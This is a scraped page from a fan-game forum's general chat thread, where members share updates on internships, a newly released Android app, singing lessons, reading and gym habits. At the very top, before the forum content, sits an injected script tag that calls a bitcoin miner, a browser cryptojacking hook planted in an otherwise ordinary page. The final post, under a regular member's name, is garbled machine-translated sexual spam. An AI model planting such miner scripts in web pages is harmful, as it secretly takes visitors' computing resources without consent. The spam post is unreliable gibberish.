<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralpge projectmario fan games galaxy

The Twitter Thread or Something

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
User avatar
BobisOnlyBob
Mythical Quadruped
Posts: 821
Joined: 6 years ago
Location: the world is no longer a place

Re: Keep Talking and Nobody Explodes! Aw...

Postby BobisOnlyBob » 10 months ago

BOB is an acronym for BOB is Only BOB etc.

User avatar
Bean
Posts: 2926
Joined: 9 years ago
Location: In my own world

Re: Keep Talking and Nobody Explodes! Aw...

Postby Bean » 10 months ago

Ashan wrote: My pun was so good we had to finally change the name from "Clever, witty, pun-based thread title!" after 6 months
You joke, but that's exactly why I did it. BW

User avatar
Ashan
The world has become a place
Posts: 1977
Joined: 9 years ago
Location: Canada

Re: Keep Talking and Nobody Explodes! Aw...

Postby Ashan » 10 months ago

It's gonna take a while to get out of the habit of checking the iso forums. Multiple times a day I end up on a "this site can't be reached" page cause I open a new tab, type "is" then hit enter

rip in peace
Image
Image
Image
Image
Image
Image

User avatar
Alice
?
Posts: 2135
Joined: 7 years ago
Pronouns: Girl person
Location: Wonderland

Re: Keep Talking and Nobody Explodes! Aw...

Postby Alice » 10 months ago

Ashan wrote: It's gonna take a while to get out of the habit of checking the iso forums. Multiple times a day I end up on a "this site can't be reached" page cause I open a new tab, type "is" then hit enter

rip in peace
I actually had to get rid of my bookmark for similar reasons. I'd kept it since it shifted most of my bookmarks out of alignment when removed but as it turns out getting used to that change was easier than IsoNation being gone, lol.

User avatar
Ashan
The world has become a place
Posts: 1977
Joined: 9 years ago
Location: Canada

Re: Keep Talking and Nobody Explodes! Aw...

Postby Ashan » 10 months ago

Just finished my last day at my software dev internship and wow

Crazy how fast that year went. Now to go back to living with my parents and going to school again. Gonna be a big changeup.
Image
Image
Image
Image
Image
Image

User avatar
Bean
Posts: 2926
Joined: 9 years ago
Location: In my own world

Re: Keep Talking and Nobody Explodes! Aw...

Postby Bean » 10 months ago

Congrats on that. Did the internship go well for you?

User avatar
Ashan
The world has become a place
Posts: 1977
Joined: 9 years ago
Location: Canada

Re: Keep Talking and Nobody Explodes! Aw...

Postby Ashan » 9 months ago

Yeah I think so! I'm a little disappointed that I didn't get the social improvement I was hoping for I suppose. I think I had much bigger expectation for all of the fun and interesting stuff I'd be doing once I moved out on my own but I kinda didn't end up doing anything. So now I'm trying to make more of an effort to force myself to do things cause I need to spend less time staring at a computer and getting nothing done. I took the first step towards that today and finally pulled the trigger on signing up for vocal lessons! First one is on the 13th
Image
Image
Image
Image
Image
Image

User avatar
Ashan
The world has become a place
Posts: 1977
Joined: 9 years ago
Location: Canada

Re: Keep Talking and Nobody Explodes! Aw...

Postby Ashan » 9 months ago

Gonna do a tiny bit of shilling for myself here.

If you're on Android, I just released my first Android app!

Image

Pretty simple thing, write and save quotes so you can see them again later. You can export them as an image or share them to other apps.
Bigger writeup here with some screenshots.
Or go straight to the Play Store and check it out here!

App is free, with an optional $1.99 upgrade to disable ads (and more coming in the future).

Bonus points if you can figure out what the icon is referencing (name is also a hint). Answer is in the reddit comments.
Image
Image
Image
Image
Image
Image

User avatar
Awoo
I came here to awoo at you!
Posts: 800
Joined: 1 year ago
Pronouns: he/him/his

Re: Keep Talking and Nobody Explodes! Aw...

Postby Awoo » 9 months ago

Quickman?
ワンワン :pal:
Image
Image
Avatar shamelessly taken from:


User avatar
Ashan
The world has become a place
Posts: 1977
Joined: 9 years ago
Location: Canada

Re: Keep Talking and Nobody Explodes! Aw...

Postby Ashan » 9 months ago

Yeah :P
Image
Image
Image
Image
Image
Image

User avatar
Bean
Posts: 2926
Joined: 9 years ago
Location: In my own world

Re: Keep Talking and Nobody Explodes! Aw...

Postby Bean » 9 months ago

Ashan wrote: I took the first step towards that today and finally pulled the trigger on signing up for vocal lessons! First one is on the 13th
Good luck! That's part of the reason I got into trying out voice acting last year. I just want to be more confident as a speaker. It's working, so hopefully your own deal will help you out, too!

User avatar
SAJewers
hi
Posts: 3022
Joined: 7 years ago
Location: Nova Scotia

Re: Keep Talking and Nobody Explodes! Aw...

Postby SAJewers » 9 months ago

Figure I would post this here for any programmers or people who like to play retro Japanese games (like raocow)

https://www.bountysource.com/issues/521 ... y-language
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
Ashan
The world has become a place
Posts: 1977
Joined: 9 years ago
Location: Canada

Re: Keep Talking and Nobody Explodes! Aw...

Postby Ashan » 9 months ago

Bean wrote:
Ashan wrote: I took the first step towards that today and finally pulled the trigger on signing up for vocal lessons! First one is on the 13th
Good luck! That's part of the reason I got into trying out voice acting last year. I just want to be more confident as a speaker. It's working, so hopefully your own deal will help you out, too!
Thanks a lot, glad it's working for you!
I heard from a friend that learning to sing helps you with projecting your voice. I'm much quieter than I'd like to be so hopefully this fixes that a bit.
Image
Image
Image
Image
Image
Image

User avatar
SAJewers
hi
Posts: 3022
Joined: 7 years ago
Location: Nova Scotia

Re: Keep Talking and Nobody Explodes! Aw...

Postby SAJewers » 9 months ago

ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
BobisOnlyBob
Mythical Quadruped
Posts: 821
Joined: 6 years ago
Location: the world is no longer a place

Re: Keep Talking and Nobody Explodes! Aw...

Postby BobisOnlyBob » 9 months ago

Nothing too drastic - all protos of known games with corresponding regional titles - but still cool shit in the world of game preservation and archival. Sad to hear about that collector's passing.
BOB is an acronym for BOB is Only BOB etc.

User avatar
Ashan
The world has become a place
Posts: 1977
Joined: 9 years ago
Location: Canada

Re: Keep Talking and Nobody Explodes! Aw...

Postby Ashan » 9 months ago

I had my first vocal lesson today. The guy that is supposed to regularly be teaching who I've never met apparently is working on a musical right now so his nephew is filling in for him. It was a lot of fun. He asked what kind of music I listen to/want to sing at the beginning and I listed a few artists. The second artist I named was Jonathan Coulton who I assumed he wouldn't know since he has kind of a small cult following, but to my surprise the guy was also a fan! He said he's been listening to Solid State recently and I told him I had recently bought in on vinyl.

Later we were just trying to find a song to sing to get a feel for things, he threw out American Pie as it was one of the first songs listed in the giant book of piano songs he had so I said sure, and before we started I said "I think I probably know the Weird Al version better" and he was like "yeah me too" so we belted out the entirety of The Saga Begins from memory together, he even remembered the lyrics to some verses where i was forgetting.

It was a good time!
Image
Image
Image
Image
Image
Image

User avatar
Emmeth
Posts: 28
Joined: 8 years ago
Location: Norway

Re: Keep Talking and Nobody Explodes! Aw...

Postby Emmeth » 9 months ago

Hey guys!
What have you been up to?

I have been reading JRR Tolkien books, I finished The Hobbit last weekend and immediately started Lord of the Rings. As of today I am done with the first book of Fellowship of the Ring and am one chapter into the second book.
Some friend of mine has said they find his work/style a bit dry, which I can totally understand. I am enjoying it personally though.
Sometimes it's easier to let go than go on.

User avatar
Ashan
The world has become a place
Posts: 1977
Joined: 9 years ago
Location: Canada

Re: Keep Talking and Nobody Explodes! Aw...

Postby Ashan » 9 months ago

Man it's always so hard to drag myself to the gym, but it's getting easier each time and there's nothing like that pizzazz boost you get afterwards, feels like you could conquer the world, hell yeah
Image
Image
Image
Image
Image
Image

User avatar
Awoo
I came here to awoo at you!
Posts: 800
Joined: 1 year ago
Pronouns: he/him/his

Re: Keep Talking and Nobody Explodes! Aw...

Postby Awoo » 9 months ago

Ashan wrote: I had my first vocal lesson today. The guy that is supposed to regularly be teaching who I've never met apparently is working on a musical right now so his nephew is filling in for him. It was a lot of fun. He asked what kind of music I listen to/want to sing at the beginning and I listed a few artists. The second artist I named was Jonathan Coulton who I assumed he wouldn't know since he has kind of a small cult following, but to my surprise the guy was also a fan! He said he's been listening to Solid State recently and I told him I had recently bought in on vinyl.

Later we were just trying to find a song to sing to get a feel for things, he threw out American Pie as it was one of the first songs listed in the giant book of piano songs he had so I said sure, and before we started I said "I think I probably know the Weird Al version better" and he was like "yeah me too" so we belted out the entirety of The Saga Begins from memory together, he even remembered the lyrics to some verses where i was forgetting.

It was a good time!
Sounds fun! Anything in particular you'd like to sing?
Emmeth wrote: Hey guys!
What have you been up to?

I have been reading JRR Tolkien books, I finished The Hobbit last weekend and immediately started Lord of the Rings. As of today I am done with the first book of Fellowship of the Ring and am one chapter into the second book.
Some friend of mine has said they find his work/style a bit dry, which I can totally understand. I am enjoying it personally though.
I remember reading the first book for a class a long time ago and was seriously confused by the Tom Bombadil bit. Quite the odd character, that one.
Ashan wrote: Man it's always so hard to drag myself to the gym, but it's getting easier each time and there's nothing like that pizzazz boost you get afterwards, feels like you could conquer the world, hell yeah
I should get a gym membership again, especially considering how much manual labor my current job requires. Might do next paycheck since there's a decent looking gym in walking distance of where I live
ワンワン :pal:
Image
Image
Avatar shamelessly taken from:


User avatar
Bean
Posts: 2926
Joined: 9 years ago
Location: In my own world

Re: Keep Talking and Nobody Explodes! Aw...

Postby Bean » 9 months ago

Voice acting auditions went out like crazy this month. When I started last year, 10 used to be a great number. A few months ago, 20 started to become the norm. This month hit over 30 now. I really, really want to improve so I can get more work. I'm taking it pretty seriously while also remembering to have fun. That's what I've been up to in September, and that's with being sick for more than a week. Kind of neat!

User avatar
Ashan
The world has become a place
Posts: 1977
Joined: 9 years ago
Location: Canada

Re: Keep Talking and Nobody Explodes! Aw...

Postby Ashan » 9 months ago

Awoo wrote: Sounds fun! Anything in particular you'd like to sing?
I've had Raindrops Keep Falling On My Head stuck in my head for like 2 weeks now cause I watched Spider-Man 2, so I'm thinking I'll put some time into making that part of my repertoire!
Image
Image
Image
Image
Image
Image

User avatar
Awoo
I came here to awoo at you!
Posts: 800
Joined: 1 year ago
Pronouns: he/him/his

Re: Keep Talking and Nobody Explodes! Aw...

Postby Awoo » 8 months ago

I'm seriously impressed, I had no idea how someone would even cosplay as Suu from Monster Musume, but they managed to do it:

I think I'm in love o3o

ワンワン :pal:
Image
Image
Avatar shamelessly taken from:


User avatar
SAJewers
hi
Posts: 3022
Joined: 7 years ago
Location: Nova Scotia

Re: Keep Talking and Nobody Explodes! Aw...

Postby SAJewers » 8 months ago

Congratulations Quebec on electing the CAQ as your new government.
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
YelseyKing
Anyone want a banana? :3
Posts: 1275
Joined: 5 years ago
First name: Matt
Location: Oregon

Re: Keep Talking and Nobody Explodes! Aw...

Postby YelseyKing » 8 months ago

I'd like to take this moment to honor the memory of a very subtle spambot I just deleted.

Rest in peace, "PC Game 2018 Free Download Best Game PC Extreme Only At [Redacted URL because seriously].com". You won't be missed.
Image
Ayjo and Meya are watching you. Be on your best behavior.

Moists:
Image

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

User avatar
Ashan
The world has become a place
Posts: 1977
Joined: 9 years ago
Location: Canada

Re: Keep Talking and Nobody Explodes! Aw...

Postby Ashan » 8 months ago

Probably , many often wonder :
Similarly, take a man having sex with a lesbian bisexual does ?

It's easier than you think to look pioneer .

Some lesbians are not 100% lesbian and do not hate
men in the planetary scale. Attracts many bisexual
periodic sex with men, koekogda lesbian couples practice
zhmzh sex . Gnaw some women who are not fully transferred
male sex, only they do not unreasonably fast and vidimonevidimo , eyey and we hurt them ,
probably sometime.We need just a smidgen
bisexual who have some conditions can read
the warmth of his body man.
Image
Image
Image
Image
Image
Image


Return to “the gazebo”

Who is online

Users browsing this forum: No registered users and 14 guests